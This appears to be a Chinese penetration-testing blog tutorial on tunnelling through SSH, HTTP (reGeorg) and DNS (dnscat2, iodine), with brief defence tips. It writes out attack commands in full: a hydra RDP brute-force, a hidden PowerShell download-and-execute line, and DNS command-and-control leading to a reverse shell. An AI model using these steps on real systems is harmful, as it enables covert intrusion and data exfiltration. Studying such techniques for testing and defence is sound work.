'应用层隧道技术'

发表于 2020-03-31 更新于 2024-01-18 分类于渗透测试阅读次数：

SSH协议

一个普通的ssh远程连接命令
ssh root@192.168.1.1

创建SSH隧道常用参数如下:
-C：压缩传输，提高传输速度
-f：将SSH传输转入后台执行，不占用当前的shell
-N：建立静默连接(建立了连接，但看不到具体的会话)
-g：允许远程主机连接本地用于转发的端口
-L：本地端口转发
-R：远程端口转发
-D：动态转发(SOCKS代理)
-P：指定SSH端口

1、本地转发

kali(攻击机)执行，会要求输入跳板机密码
ssh -CfNg -L 1153(攻击机):1.1.1.10(目标机).3389(目标机) root@192.168.1.1(跳板机)
netstat -tulnp | grep “1153” 查看端口
rdesktop 127.0.0.1:1153 进行连接
本地转发是将远程主机某个端口的数据转发到本地机器的指定端口。

2、远程转发

WEB服务器(跳板机)执行
ssh -CfNg -R 3307(攻击机):1.1.1.10(目标机):3389(目标机) root@192.168.1.4(攻击机)
远程转发是在远程服务器上监听一个端口，所有访问远程服务器指定端口的数据都会通过SSH隧道传输到本地的对应端口。

3、动态转发

kali(攻击机)执行命令，建立SOCKS 4/5代理通道
ssh -CfNg -D 7000 root@192.168.1.1(WEB服务器)
配置SOCKS代理 127.0.0.1 7000
浏览器访问1.1.1.2(内网web服务器)即可看到web服务

4、防御SSH隧道攻击的思路

系统中配置SSH远程管理白名单，在ACL中限制只有指定IP地址才能访问SSH，以及设置系统完全使用带外管理等。如果没有足够的资源建立带外管理的网络结构，至少限制SSH远程登陆IP，并设置双向访问控制策略(从外到内，从内到外)。

HTTP/HTTPS协议

HTTP service代理用于将所有的流量转发到内网。常用代理工具有reGeorg、meterpreter、tunna等。
reGeorg原理：把内网服务器端口的数据通过HTTP/HTTPS隧道转发到本机，实现基于HTTP协议的通信。(会被杀软查杀)
下载链接https://github.com/sensepost/reGeorg
将tunnel.jsp脚本(有其他类型脚本,ASPX、PHP、JSP等)上传到目标服务器
python reGeorgSocksProxy.py -u http://192.168.1.1/tunnel.jsp -p 9999
执行后，配置proxychains 127.0.0.1 9999
就可访问目标服务器
使用九头蛇(hydra)爆破3389远程桌面连接等操作
proxychains hydra -s 3389 -V -l administrator -P /root/destop/passwd.txt -t 8 192.168.1.1 rdp

DNS协议

优点：DNS协议难以被禁用，报文具有穿透防火墙的能力。由于防火墙和入侵检测设备(IPS/IDS)大都不会过滤DNS流量，也为DNS成为隐蔽通信创造了条件。
DNS隧道工作原理：在进行DNS查询时，如果查询的域名不在DNS服务器本机的缓存中，就会访问互联网进行查询，然后返回结果。预期返回的是一个IP地址，但返回的可以是任意字符串，包括加密的C&C指令。
使用DNS隧道与外部进行通信时，从表面上看没有连接外网的(内网网关没有转发IP数据包)，但实际上，内网的DNS服务器进行了中转操作。原理简单来说就是将其他协议封装在DNS协议中进行传输。

1、查看DNS的连通性

查看内部域名及IP地址
cat /etc/resolv.conf|grep -v ‘#’

是否能与内部DNS通信
nslookup hack.lab

查询能否通过内部DNS服务器解析外部域名
nslookup www.baidu.com

2、dnscat2

简介：开源软件，使用DNS协议创建加密的C&C通道，通过预共享密钥进行身份验证；使用shell及DNS查询类型，多个同时进行的会话类似于SSH中的通道。客户端用C编写，服务端用Ruby编写。

直连模式：客户端直接指定IP地址的DNS服务器发起DNS解析请求。(内网放行所有DNS请求时使用)
中继模式：DNS经过互联网的迭代解析，指向指定的DNS服务器。速度比直连慢。(内网只允许白名单服务器或制定域)

(1)部署域名解析

搞台VPS安装linux，并配置域名。
创建A记录，域名解析服务器指向VPS的IP。再创建NS记录，将dnsch子域名的解析结果指向域名解析服务器(ns1.sunian.top)。
PS：注意开放防火墙dnsnat2走的是UDP的流量！
验证是否设置成功
ping ns1.sunian.top (返回VPS的IP，说明A生效)
tcpdump -n -i eth0 udp dst port 53 (VPS上抓包53端口)
nslookup vpn.sunian.top (查看抓包情况，抓到DNS请求包，说明NS生效)

(2)安装

apt-get install gem
apt-get install ruby-dev
apt-get install libpq-dev
apt-get install ruby-bundler

apt-get install git
git clone https://github.com/iagox86/dnscat2
cd dnscat2/server
bundle install

(3)启动服务端

sudo ruby ./dnscat2.rb vpn.sunian.top -e open -c suniana --no-cache
如果采用的是直连，可使用以下命令
sudo ruby ./dnscat2.rb --dns server=127.0.0.1,port=533,type=TXT --secret=suniana
以上命令表示监听533端口，自定义连接密码为"suniana"
-c：定义"pre-shared secret"，使用具有预共享密钥的身份验证机制来防止中间人攻击。
-e：规定安全级别。"open"代表服务端允许客户端不进行加密。
–no-cache：禁止缓存。务必运行服务器时添加该选项。因为powershell-dnscat2与dnscat2的Caching模式不兼容。

(4)目标机安装客户端

linux中：
git clone https://github.com/iagox86/dnscat2
cd dnscat2/client/
make
windows中(直接使用编译好的)：
https://downloads.skullsecurity.org/dnscat2/

(5)检测是否能通信

dnscat2-v0.07-client-win32.exe --ping vpn.sunian.top
显示"creating a ping session!“… 即可
连接服务端
dnscat2-v0.07-client-win32.exe --dns domain=vpn.sunian.top --secret suniana
连接成功，则显示"session established!”

如果服务端使用的是直连模式(未测试成功)，可直接填写服务端的IP地址(不通过DNS服务商)，向服务端所在IP请求DNS解析。
dnscat --dns port=533,server=192.168.1.1,domain=vpn.sunian.top --secret=suniana

(6)推荐使用powershell版本的dnscat2客户端。

直接将脚本拖上去，执行
Import-Module ./dnscat2.ps1
或使用命令下载
IEX(New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1’)
加载脚本后，开启服务
start-Dnscat2 -Domain vpn.sunian.top -DNSServer 192.168.1.1

(7)使用IEX加载脚本的方式，在内存打开dnscat2客户端

powershell.exe -nop -w hidden -c {IEX(New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1’); start-Dnscat2 -Domain vpn.sunian.top -DNSServer 192.168.1.1}
执行以下命令，创建一个控制台，然后执行powershell命令和脚本
exec psh

(8)反弹shell

使用方法与Metasploit相似，客户端运行dnscat2.ps1后，可以在服务端看到上线情况
New windows created:1
session -i 1 (调用sesion，连接shell)
exec notepad.exe (打开记事本)

命令介绍
clear：清屏。
delay：修改远程响应延时。
exec：执行远程机器上的指定程序。
shell：得到一个反弹shell
download/upload：在两端之间上传/下载文件。适合小文件。
suspend：返回上一层，相当于快捷键"ctrl+z"。
listen：类似于SSH隧道的-L参数(本地转发)，例如listen 0.0.0.0:53 192.168.1.1:3389
ping：确认目标机器是否在线。返回"pong"，则在线。
shutdown：切断当前会话。
quit：退出。
kill：切断指定通道。
set：设置值，例如security=open。
windows(session)：列出所有通道。
windows -i ：连接某个通道。

提供多域名并发。即多个子域名绑定同一个NS下，服务端可接收多个客户端
ruby dnscat2.rb --dns=port=533 --security=open start --dns domain=,domain=

3、iodine

(1)简介

和dnscat2一样分为直连和中继模式。原理：通过TAP虚拟网卡，在服务端建立一个局域网；在客户端，通过TAP建立一个虚拟网卡；两者通过DNS隧道连接，处于同一个局域网。连接成功后，客户端会多出一个名为"dns0"的虚拟网卡。
PS：域名解析的设置和dnsnat2相同

(2)安装与运行

https://github.com/Al1ex/iodine
kali、ubantu直接使用以下命令安装
apt install iodine
运行：
iodined -f -c -P suniana 192.168.0.1(自定义局域网IP) vpn.sunian.top -DD
完成基本配置后访问https://code.kryo.se/iodine/check-it
检查配置是否正确，也可查看网卡

命令详解
-f：在前台运行。
-c：禁止检查所有传入请求的客户端IP地址。
-P：设置连接密码。
-D：指定调试级别。-DD指2级。D的数量随等级增加。

安装客户端
iodine -f -P suniana -M 200 vpn.sunian.top
PS：需要使用管理员权限启动

-r：有时会自动切换为UDP通道，该命令强制使用DNS隧道(无论什么情况)
-M：指定上行主机名的大小。
-m：调节最大下行分片的大小。
-T：指定DNS请求类型。可选NULL、PRIVATE、TXT、SRV、CNAME、MX、A。
-O：指定数据编码规范。
-L：是否开启懒惰模式。
-I：指定请求与请求之间的时间间隔。

若出现"Connection setup complete,transmitting data"的提示信息，就代表DNS隧道已建立。

(3)使用DNS隧道
因为处于同一个局域网中，只需直接访问服务端即可。例如，ssh sunian@10.0.0.1 命令。

防御DNS隧道攻击

(1)、禁止网络中任何人向外部服务器发送DNS请求，只允许受信任的DNS服务器通信。
(2)、将邮件服务器/网关列入白名单并阻止传入和传出流量中的TXT请求。
(3)、跟踪用户的DNS查询次数。达到阈值，就生成相应的报告。
(4)、阻止ICMP。